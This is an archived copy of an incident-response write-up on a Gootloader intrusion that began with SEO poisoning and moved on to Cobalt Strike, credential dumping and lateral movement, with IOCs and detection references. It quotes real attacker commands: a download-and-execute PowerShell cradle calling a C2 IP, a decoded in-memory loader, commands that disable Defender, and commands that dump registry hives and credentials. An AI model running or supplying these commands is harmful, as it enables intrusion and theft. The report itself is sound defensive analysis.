{
	"id": "e4a4fb1f-7ff7-48cc-9266-975e833749b9",
	"created_at": "2026-04-06T00:09:17.442497Z",
	"updated_at": "2026-04-10T13:11:22.444972Z",
	"deleted_at": null,
	"sha1_hash": "fd826df6a1a0e5f8bffba5cd046d5401ad065143",
	"title": "SEO Poisoning - A Gootloader Story",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4657629,
	"plain_text": "SEO Poisoning - A Gootloader Story\r\nBy editor\r\nPublished: 2022-05-09 · Archived: 2026-04-05 13:18:48 UTC\r\nIn early February 2022, we witnessed an intrusion employing Gootloader (aka GootKit) as the initial access vector.\r\nThe intrusion lasted two days and comprised discovery, persistence, lateral movement, collection, defense evasion,\r\ncredential access and command and control activity. During the post-exploitation phase, the threat actors used RDP, WMI,\r\nMimikatz, Lazagne, WMIExec, and SharpHound. The threat actors then used this access to review sensitive documents.\r\nBackground\r\nGootloader was the name assigned to the multi-staged payload distribution by Sophos in March 2021. The threat actors\r\nutilize SEO (search engine optimization) poisoning tactics to move compromised websites hosting malware to the top of\r\ncertain search requests such as “what is the difference between a grand agreement and a contract?” or “freddie mac shared\r\ndriveway agreement?”\r\nWhen the user searches for these phrases and clicks on one of the top results, they are left with a forum-looking web page\r\nwhere the user is instructed to download a file, which they accidentally execute (double click to open). You can learn more\r\nabout Gootloader by reading these references. 1 2 3 4\r\nThe researcher behind the @GootLoaderSites account is doing a great job of providing operational intelligence about the\r\nmost recent malicious infrastructure. They also contact impacted businesses, monitor for newly created C2 addresses, and\r\nmake the information public to the community. Thank you!\r\nCase Summary\r\nThe intrusion started with a user searching Bing for “Olymplus Plea Agreement?”. 
The user then clicked on the second\r\nsearch result which led to the download and execution of a malicious javascript file (see video in Initial Access section).\r\nUpon execution, Gootloader utilized encoded PowerShell scripts to load Cobalt Strike into memory and persist on the host\r\nusing a combination of registry keys and scheduled tasks.\r\nFifteen minutes after the initial execution, we observed the threat actors using the PowerShell implementation of\r\nSharpHound (BloodHound) to discover attack paths in the Active Directory-based network. The threat actors collected the\r\nresults and pivoted to another host via a Cobalt Strike PowerShell beacon.\r\nAfter pivoting, they disabled Windows Defender, before executing a second Cobalt Strike payload for a different command\r\nand control server. Around an hour after the initial infection, the threat actors ran LaZagne to retrieve all saved credentials\r\nfrom the pivoted workstation. Meanwhile on the beachhead host, the threat actors ran Mimikatz via PowerShell to extract\r\ncredentials.\r\nWith those credentials, the threat actors used RDP from the beachhead host to the already compromised workstation host.\r\nThey then targeted several other workstations with Cobalt Strike beacon executables; however, no further activity was\r\nobserved on those endpoints other than the initial lateral movement.\r\nThe threat actors favored RDP and remote WMI as their preferred methods to interact with the hosts and servers of interest\r\nthroughout the rest of the intrusion. After around a four-hour pause of inactivity, the threat actors enabled restricted admin\r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 1 of 20\n\nmode via WMI on a domain controller and logged in using RDP.\r\nThe threat actors then used Lazagne again on the domain controller to extract more credentials. Our evidence shows that the\r\nattackers then began looking for interesting documents on file shares. 
They opened the documents one-by-one on the remote\r\nhost via RDP. They directed their focus to documents with legal and insurance-related content.\r\nOn the second and final day of the intrusion, the threat actors ran Advanced IP Scanner from the domain controller via the\r\nRDP session. Additionally, they inspected the file server and backup server, looking for more interesting data before leaving\r\nthe network.\r\nServices\r\nWe offer multiple services, including a Threat Feed service that tracks Command and Control frameworks such as Cobalt\r\nStrike, BazarLoader, Covenant, Metasploit, Empire, PoshC2, etc. More information on this service and others can be\r\nfound here.\r\nWe also have artifacts and IOCs available from this case, such as pcaps, memory captures, files, event logs including\r\nSysmon, Kape packages, and more, under our Security Researcher and Organization services.\r\nTimeline\r\nAnalysis and reporting completed by @kostastsale @iiamaleks @pigerlin\r\nInitial Access\r\nThe threat actor gained initial access using Gootloader malware. 
Here’s a video of the user searching and downloading the\r\nmalware via the poisoned SEO search.\r\nThe Javascript file is then executed when double clicked after the zip is opened.\r\nExecution\r\nGootloader upon execution creates two registry keys:\r\nHKCU:\\SOFTWARE\\Microsoft\\Phone\\Username\r\nHKCU:\\SOFTWARE\\Microsoft\\Phone\\Username0\r\nThe first is populated with an encoded Cobalt Strike payload and the latter is used to store a .NET loader named\r\npowershell.dll.\r\nFollowing the Registry events, a PowerShell command was launched executing an encoded command.\r\n\"powershell.exe\" /c C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe \"/\"e\" NgAxA\"DQANgA0ADkA\"MgAxADEA\r\nThe PowerShell command will extract the .NET loader from HKCU:\\SOFTWARE\\Microsoft\\Phone\\Username0 and execute the\r\ncode in memory via `Assembly.Load()`.\r\n614649211; sleep -s 83; $opj=Get-ItemProperty -path (\"hkcu:\\software\\microsoft\\Phone\\\"+[Environment]::(\"userna\r\nThis CyberChef recipe can be used to decode the related PS encoded payload.\r\nOnce the PowerShell script is finished running, the next stage involves the .NET loader. The .NET loader will read\r\nHKCU:\\SOFTWARE\\Microsoft\\Phone\\Username and extract the encoded Cobalt Strike payload. 
This payload will be decoded\r\nand subsequently loaded into memory for execution.\r\nA simple encoding scheme is used where a letter will correspond to one of the hex characters (0-F), or alternately three\r\nzeros.\r\nq-\u003e000\r\nv-\u003e0\r\nw-\u003e1\r\nr-\u003e2\r\nt-\u003e3\r\ny-\u003e4\r\nu-\u003e5\r\ni-\u003e6\r\no-\u003e7\r\np-\u003e8\r\ns-\u003e9\r\nq-\u003eA\r\nh-\u003eB\r\nj-\u003eC\r\nk-\u003eD\r\nl-\u003eE\r\nz-\u003eF\r\nThe following shows the source code responsible for the core logic of the .NET loader.\r\nAn excellent resource from Microsoft describes a set of configurations that can be applied to Windows that can stop .js\r\nfiles from executing, preventing this attack chain from ever getting off the ground.\r\nDuring later stages of the intrusion, Cobalt Strike was executed interactively through RDP on multiple systems.\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('hxxp://37.120.198.225:80/tri\r\nPersistence\r\nThe Javascript (Gootloader) file invoked an encoded PowerShell command.\r\nThe encoded PowerShell command creates a Scheduled Task that executes when the selected user logs on to the computer.\r\nAn encoded PowerShell command is executed that will retrieve and execute the payload stored in the Registry.\r\n6876813;\r\n$a=\"NgAxADQANgA0ADkAMgAxADEAOwBzAGwAZQBlAHAAIAAtAHMAIAA4ADMAOwAkAG8AcABqAD0ARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQ\r\n$u=$env:USERNAME;\r\nRegister-ScheduledTask $u -In (New-ScheduledTask -Ac (New-ScheduledTaskAction -E ([Diagnostics.Process]::GetCu\r\n30687851\r\nDecoded PowerShell Payload:\r\n6876813;\r\n614649211;\r\n$a = \"614649211\";\r\nsleep - s 83;\r\n$opj = Get - ItemProperty - path(\"hkcu:\\software\\microsoft\\Phone\\\"\"+[Environment]::(\" username \")+\" 0 \");\r\n for ($uo = 0; $uo - le 760; 
$uo ++) {\r\n Try {\r\n $mpd += $opj.$uo\r\n }\r\n Catch {}\r\n};\r\n$uo = 0;\r\nwhile ($true) {\r\n $uo ++;\r\n $ko = [math]::(\"sqrt\")($uo);\r\n if ($ko - eq 1000) {\r\n break\r\n }\r\n}\r\n$yl = $mpd.replace(\"#\", $ko);\r\n$kjb = [byte[]]::(\"new\")($yl.Length / 2);\r\nfor ($uo = 0; $uo - lt $yl.Length; $uo += 2) {\r\n $kjb[$uo / 2] = [convert]::(\"ToByte\")($yl.Substring($uo, 2), (2 * 8))\r\n}[reflection.assembly]::(\"Load\")($kjb);\r\n[Open]::(\"Test\")();\r\n611898544;\r\n$u = $env : USERNAME;\r\nRegister - ScheduledTask $u - In(New - ScheduledTask - Ac(New - ScheduledTaskAction - E([Diagnostics.Process]\r\n306878516;\r\nThe task created from the PowerShell script:\r\nDefense Evasion\r\nThe following deletion of Windows Defender scheduled tasks was observed on multiple servers the threat actor pivoted to.\r\nschtasks /delete /tn \"\\Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan\" /f\r\nschtasks /delete /tn \"\\Microsoft\\Windows\\Windows Defender\\Windows Defender Cache Maintenance\" /f\r\nschtasks /delete /tn \"\\Microsoft\\Windows\\Windows Defender\\Windows Defender Cleanup\" /f\r\nschtasks /delete /tn \"\\Microsoft\\Windows\\Windows Defender\\Windows Defender Verification\" /f\r\nFurthermore, PowerShell was used to disable multiple security features built into Microsoft Defender.\r\nSet-MpPreference -DisableRealtimeMonitoring $true\r\nSet-MpPreference -DisableArchiveScanning $true\r\nSet-MpPreference -DisableBehaviorMonitoring $true\r\nSet-MpPreference -DisableIOAVProtection $true\r\nSet-MpPreference -DisableIntrusionPreventionSystem $true\r\nSet-MpPreference -DisableScanningNetworkFiles $true\r\nSet-MpPreference -MAPSReporting 0\r\nSet-MpPreference -DisableCatchupFullScan $True\r\nSet-MpPreference -DisableCatchupQuickScan $True\r\nAs in many cases involving Cobalt Strike, we observed rundll32 used to load 
the Cobalt Strike beacons into memory on the\r\nbeachhead host.\r\nThis can be observed in the memory dump from the beachhead host with the tell-tale PAGE_EXECUTE_READWRITE protection\r\nsettings on the memory space and MZ headers observable in the process memory space.\r\nDuring the intrusion we observed various named pipes utilized by the threat actor’s Cobalt Strike beacons including default\r\nCobalt Strike named pipes.\r\nPipeName: \\msagent_ld\r\nPipeName: \\1ea887\r\nThe threat actors were observed making use of double encoded PowerShell commands. The first layer of encoding contains\r\nHexadecimal and XOR encoding.\r\nDecoding this script reveals that it is a publicly available WMIExec script for running remote WMI queries.\r\nCredential Access\r\nThe malicious PowerShell process used by Gootloader dropped a PowerShell script named “mi.ps1” on the file system.\r\npowershell -nop -noni -ep bypass -w h -c \"\"$t=([type]'Convert');\u0026([scriptblock]::Create(($t::(($t.GetMethods()\r\nThis CyberChef recipe can be used to decode the inner encoded command.\r\nThe output lists “Invoke-Mimikatz”, a direct reference to the PowerShell Invoke-Mimikatz.ps1 script used to load Mimikatz\r\nDLL directly in memory.\r\n$u=('http://127.0.0.1:22201/'|%{(IRM $_)});$u|\u0026(GCM I*e-E*); Import-Module C:\\Users\\\u003credacted\u003e\\mi.ps1; Invoke-\r\nMonitoring PowerShell event ID 4103, we can observe the threat actor’s successful credential access activity from the\r\nMimikatz invocation.\r\nIn addition, the post-exploitation tool “LaZagne” (renamed to ls.exe) was used with the “-all” switch.\r\nls.exe all -oN -output C:\\Users\\REDACTED\r\nThis will dump passwords (browsers, LSA secret, hashdump, Keepass, 
WinSCP, RDPManager, OpenVPN, Git, etc.) and\r\nstore the output file (in our case) in the “C:\\Users” directory. When LaZagne is run with admin privileges, it also attempts to\r\ndump credentials from local registry hives, as can be seen below.\r\nHere are the commands from another system:\r\ncmd.exe /c \"reg.exe save hklm\\sam c:\\users\\REDACTED\\appdata\\local\\temp\\1\\dznuxujzr\"\r\ncmd.exe /c \"reg.exe save hklm\\system c:\\users\\REDACTED\\appdata\\local\\temp\\1\\mkffdg\"\r\ncmd.exe /c \"reg.exe save hklm\\security c:\\users\\REDACTED\\appdata\\local\\temp\\1\\iszmqwmjemt\"\r\nDiscovery\r\nThe threat actors used the PowerShell implementation of SharpHound (Bloodhound) on the beachhead host to enumerate the\r\nActive Directory domain. The Cobalt Strike beacon was used to invoke the PowerShell script.\r\npowershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAb\r\nThey also ran a WMI command on the beachhead host and one other host to check for AntiVirus.\r\nWMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List\r\nThe threat actors executed this command remotely on a domain controller, before moving laterally to it:\r\npowershell.exe ls C:\\ \u003e C:\\file.txt\r\nDuring an interactive RDP session, in an attempt to collect more information about the host, the attackers used\r\nPowerShell to run systeminfo on one of the hosts they pivoted to.\r\nOn the last day, and before they left the network, threat actors used Advanced IP Scanner to scan the whole network for the\r\nbelow open ports:\r\n21,80,135,443,445,3389,8080,56133,58000,58157,58294,58682,60234,60461,64502\r\nLateral Movement\r\nAs observed in many of our intrusions, the threat actor created and installed Windows services to deploy Cobalt Strike\r\nbeacons. 
This method was used to pivot to other systems within the network.\r\nSMB was also used to transfer executable Cobalt Strike beacons to various workstations in the environment.\r\nThese executables were then executed by a remote service visible in the Windows event ID 7045 logs.\r\nIn addition to deploying Cobalt Strike beacons, the threat actor also used RDP to establish interactive sessions with various hosts\r\non the network. One important aspect of these sessions is that the threat actor authenticated using “Restricted Admin Mode”.\r\nRestricted Admin Mode can be considered a double-edged sword; although it prevents credential theft, it also enables an\r\nattacker to perform a pass-the-hash attack using RDP. In other words, after enabling Restricted Admin Mode, just the NTLM\r\nhash of the remote desktop user is required to establish a valid RDP session, without needing to possess the cleartext\r\npassword.\r\nThe threat actor attempted to use both Invoke-WMIExec and psexec to enable “”.\r\npsexec \\\\\u003credacted\u003e -u \u003credacted\u003e\\\u003credacted\u003e -p \u003credacted\u003e reg add \"hklm\\system\\currentcontrolset\\control\\lsa\"\r\npowershell -nop -noni -ep bypass -w h -c \"$u=('http://127.0.0.1:47961/'|%%{(IRM $_)});\u0026(''.SubString.ToString(\r\nThe logon information of EventID 4624 includes a field “Restricted Admin Mode”, which is set to the value “Yes” if the\r\nfeature is used.\r\nCollection\r\nThe threat actor accessed multiple files during the RDP sessions on multiple servers. 
In one instance document files were\r\nopened directly on the system.\r\nShellbags revealed attempts to enumerate multiple file shares containing information of interest to the threat actor.\r\nCommand and Control\r\nGootloader\r\nGootloader second stage download URLs. These URLs were deobfuscated and extracted using this script by HP Threat\r\nResearch. They’ve updated this script at least a few times now, thanks @hpsecurity and thanks to @GootLoaderSites for\r\nsharing on twitter as it's broken/fixed.\r\nhxxps://kakiosk.adsparkdev[.]com/test.php?hjkiofilihyl=\r\nhxxps://jp.imonitorsoft[.]com/test.php?hjkiofilihyl=\r\nhxxps://junk-bros[.]com/test.php?hjkiofilihyl=\r\nDuring the intrusion the Gootloader loader was observed communicating to 35.206.117.64:443 kakiosk[.]adsparkdev[.]com.\r\nJa3:a0e9f5d64349fb13191bc781f81f42e1\r\nJa3s:567bb420d39046dbfd1f68b558d86382\r\nCertificate: [d8:85:d1:48:a2:99:f5:ee:9d:a4:3e:01:1c:b0:ec:12:e5:23:7d:61 ]\r\nNot Before: 2022/01/05 09:25:33 UTC\r\nNot After: 2022/04/05 09:25:32 UTC\r\nIssuer Org: Let's Encrypt\r\nSubject Common: kakiosk.adsparkdev.com [kakiosk.adsparkdev.com ,www.kakiosk.adsparkdev.com ]\r\nPublic Algorithm: rsaEncryption\r\nCobalt Strike\r\n146.70.78.43\r\nCobalt Strike server TLS configuration:\r\n146.70.78.43\r\nJa3:72a589da586844d7f0818ce684948eea\r\nJa3s:f176ba63b4d68e576b5ba345bec2c7b7\r\nSerial Number: 146473198 (0x8bb00ee)\r\nCertificate: 73:6B:5E:DB:CF:C9:19:1D:5B:D0:1F:8C:E3:AB:56:38:18:9F:02:4F\r\nNot Before: May 20 18:26:24 2015 GMT\r\nNot After: May 17 18:26:24 2025 GMT\r\nIssuer: C=, ST=, L=, O=, OU=, CN=\r\nSubject: C=, ST=, L=, O=, OU=, CN=\r\nPublic Algorithm: rsaEncryption\r\nCobalt Strike beacon configuration:\r\nCobalt Strike Beacon:\r\n x86:\r\n beacon_type: HTTPS\r\n dns-beacon.strategy_fail_seconds: -1\r\n dns-beacon.strategy_fail_x: -1\r\n dns-beacon.strategy_rotate_seconds: -1\r\n http-get.client:\r\n 
Cookie\r\n http-get.uri: 146.70.78.43,/visit.js\r\n http-get.verb: GET\r\n http-post.client:\r\n Content-Type: application/octet-stream\r\n id\r\n http-post.uri: /submit.php\r\n http-post.verb: POST\r\n maxgetsize: 1048576\r\n port: 443\r\n post-ex.spawnto_x64: %windir%\\sysnative\\rundll32.exe\r\n post-ex.spawnto_x86: %windir%\\syswow64\\rundll32.exe\r\n process-inject.execute:\r\n CreateThread\r\n SetThreadContext\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\n process-inject.startrwx: 64\r\n process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648\r\n process-inject.userwx: 64\r\n proxy.behavior: 2 (Use IE settings)\r\n server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64\r\n sleeptime: 60000\r\n useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; yie9)\r\n uses_cookies: 1\r\n watermark: 1580103824\r\n x64:\r\n beacon_type: HTTPS\r\n dns-beacon.strategy_fail_seconds: -1\r\n dns-beacon.strategy_fail_x: -1\r\n dns-beacon.strategy_rotate_seconds: -1\r\n http-get.client:\r\n Cookie\r\n http-get.uri: 146.70.78.43,/fwlink\r\n http-get.verb: GET\r\n http-post.client:\r\n Content-Type: application/octet-stream\r\n id\r\n http-post.uri: /submit.php\r\n http-post.verb: POST\r\n maxgetsize: 1048576\r\n port: 443\r\n post-ex.spawnto_x64: %windir%\\sysnative\\rundll32.exe\r\n post-ex.spawnto_x86: %windir%\\syswow64\\rundll32.exe\r\n process-inject.execute:\r\n CreateThread\r\n SetThreadContext\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\n process-inject.startrwx: 64\r\n process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648\r\n process-inject.userwx: 64\r\n proxy.behavior: 2 (Use IE settings)\r\n server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64\r\n sleeptime: 60000\r\n useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENXA)\r\n uses_cookies: 1\r\n watermark: 1580103824\r\n37.120.198.225\r\nCobalt 
Strike server TLS configuration:\r\nJa3:72a589da586844d7f0818ce684948eea\r\nJa3s:f176ba63b4d68e576b5ba345bec2c7b7\r\nSerial Number: 146473198 (0x8bb00ee)\r\nCertificate: 73:6B:5E:DB:CF:C9:19:1D:5B:D0:1F:8C:E3:AB:56:38:18:9F:02:4F\r\nNot Before: May 20 18:26:24 2015 GMT\r\nNot After : May 17 18:26:24 2025 GMT\r\nIssuer: C=, ST=, L=, O=, OU=, CN=\r\nSubject: C=, ST=, L=, O=, OU=, CN=\r\nPublic Algorithm: rsaEncryption\r\nCobalt Strike beacon configuration:\r\nCobalt Strike Beacon:\r\n x86:\r\n beacon_type: HTTPS\r\n dns-beacon.strategy_fail_seconds: -1\r\n dns-beacon.strategy_fail_x: -1\r\n dns-beacon.strategy_rotate_seconds: -1\r\n http-get.client:\r\n Cookie\r\n http-get.uri: 37.120.198.225,/cm\r\n http-get.verb: GET\r\n http-post.client:\r\n Content-Type: application/octet-stream\r\n id\r\n http-post.uri: /submit.php\r\n http-post.verb: POST\r\n maxgetsize: 1048576\r\n port: 443\r\n post-ex.spawnto_x64: %windir%\\sysnative\\rundll32.exe\r\n post-ex.spawnto_x86: %windir%\\syswow64\\rundll32.exe\r\n process-inject.execute:\r\n CreateThread\r\n SetThreadContext\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\n process-inject.startrwx: 64\r\n process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648\r\n process-inject.userwx: 64\r\n proxy.behavior: 2 (Use IE settings)\r\n server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64\r\n sleeptime: 60000\r\n useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)\r\n uses_cookies: 1\r\n watermark: 1580103824\r\n x64:\r\n beacon_type: HTTPS\r\n dns-beacon.strategy_fail_seconds: -1\r\n dns-beacon.strategy_fail_x: -1\r\n dns-beacon.strategy_rotate_seconds: -1\r\n http-get.client:\r\n Cookie\r\n http-get.uri: 37.120.198.225,/ptj\r\n http-get.verb: GET\r\n http-post.client:\r\n Content-Type: application/octet-stream\r\n id\r\n http-post.uri: /submit.php\r\n http-post.verb: POST\r\n maxgetsize: 1048576\r\n 
port: 443\r\n post-ex.spawnto_x64: %windir%\\sysnative\\rundll32.exe\r\n post-ex.spawnto_x86: %windir%\\syswow64\\rundll32.exe\r\n process-inject.execute:\r\n CreateThread\r\n SetThreadContext\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\n process-inject.startrwx: 64\r\n process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648\r\n process-inject.userwx: 64\r\n proxy.behavior: 2 (Use IE settings)\r\n server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64\r\n sleeptime: 60000\r\n useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_v\r\n uses_cookies: 1\r\n watermark: 1580103824\r\nNetscan data extracted via Volatility from the beachhead host showing Cobalt Strike C2 connections:\r\nVolatility 3 Framework 2.0.0\r\nOffset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Create\r\n...\r\n0x948431c46010 TCPv4 10.X.X.X 52670 146.70.78.43 443 CLOSE_WAIT 3420 rundll32.exe\r\n0x948431e19010 TCPv4 10.X.X.X 63723 146.70.78.43 443 CLOSED 3420 rundll32.exe\r\n0x9484337f18a0 TCPv4 10.X.X.X 52697 146.70.78.43 443 CLOSE_WAIT 3420 rundll32.exe\r\n0x948435102050 TCPv4 10.X.X.X 52689 146.70.78.43 443 CLOSE_WAIT 3420 rundll32.exe\r\n...\r\nImpact\r\nIn this case, there was no further impact to the environment before the threat actors were evicted.\r\nIndicators\r\nNetwork\r\nGootloader\r\nhttps://kakiosk.adsparkdev[.]com\r\nhttps://jp.imonitorsoft[.]com\r\nhttps://junk-bros[.]com\r\n35.206.117.64:443\r\nCobalt Strike\r\n146.70.78.43:443\r\n37.120.198.225:443\r\nFile\r\nolympus_plea_agreement 34603 .js\r\nd7d3e1c76d5e2fa9f7253c8ababd6349\r\n724013ea6906a3122698fd125f55546eac0c1fe0\r\n6e141779a4695a637682d64f7bc09973bb82cd24211b2020c8c1648cdb41001b\r\nolympus plea 
agreement(46196).zip\r\nb50333ff4e5cbcda8b88ce109e882eeb\r\n44589fc2a4d1379bee93282bbdb16acbaf762a45\r\n7d93b3531f5ab7ef8d68fb3d06f57e889143654de4ba661e5975dae9679bbb2c\r\nmi.ps1\r\nacef25c1f6a7da349e62b365c05ae60c\r\nc5d134a96ca4d33e96fb0ab68cf3139a95cf8071\r\nd00edf5b9a9a23d3f891afd51260b3356214655a73e1a361701cda161798ea0b\r\nInvoke-WMIExec.ps1\r\nb4626a335789e457ea48e56dfbf39710\r\n62a7656d81789591358796100390799e83428519\r\nc4939f6ad41d4f83b427db797aaca106b865b6356b1db3b7c63b995085457222\r\nls.exe\r\n87ae2a50ba94f45da39ec7673d71547c\r\ndfa0b4206abede8f441fcdc8155803b8967e035c\r\n8764131983eac23033c460833de5e439a4c475ad94cfd561d80cb62f86ff50a4\r\nDetections\r\nNetwork\r\nET HUNTING Suspicious Empty SSL Certificate - Observed in Cobalt Strike\r\nET MALWARE Meterpreter or Other Reverse Shell SSL Cert\r\nSigma\r\nCustom Sigma rules\r\nDeleting Windows Defender scheduled tasks\r\nEnabling restricted admin mode\r\nSigma repo rules\r\nYara\r\nCustom Yara rule\r\nMITRE\r\nT1189 – Drive-by Compromise\r\nT1204.001 – User Execution: Malicious Link\r\nT1204.002 – User Execution: Malicious File\r\nT1059.001 – Command and Scripting Interpreter: PowerShell\r\nT1053 – Scheduled Task/Job\r\nT1218.011 – System Binary Proxy Execution: Rundll32\r\nT1003.001 – OS Credential Dumping: LSASS Memory\r\nT1087 – Account Discovery\r\nT1560 – Archive Collected Data\r\nT1482 – Domain Trust Discovery\r\nT1615 – Group Policy Discovery\r\nT1069 – Permission Groups Discovery\r\nT1018 – Remote System Discovery\r\nT1033 – System Owner/User Discovery\r\nT1021.001 – Remote Services: Remote Desktop Protocol\r\nT1021.006 – Remote Services: Windows Remote Management\r\nT1005 – Data from Local System\r\nT1039 – Data from Network Shared Drive\r\nT1046 – Network Service Scanning\r\nT1562.001 – Impair Defenses: Disable or Modify Tools\r\nT1518.001 – Security Software Discovery\r\nT1071.001 – Web Protocols\r\nT1027 – 
Obfuscated Files or Information\r\nSource: https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/"
	],
	"report_names": [
		"seo-poisoning-a-gootloader-story"
	],
	"threat_actors": [],
	"ts_created_at": 1775434157,
	"ts_updated_at": 1775826682,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fd826df6a1a0e5f8bffba5cd046d5401ad065143.pdf",
		"text": "https://archive.orkl.eu/fd826df6a1a0e5f8bffba5cd046d5401ad065143.txt",
		"img": "https://archive.orkl.eu/fd826df6a1a0e5f8bffba5cd046d5401ad065143.jpg"
	}
}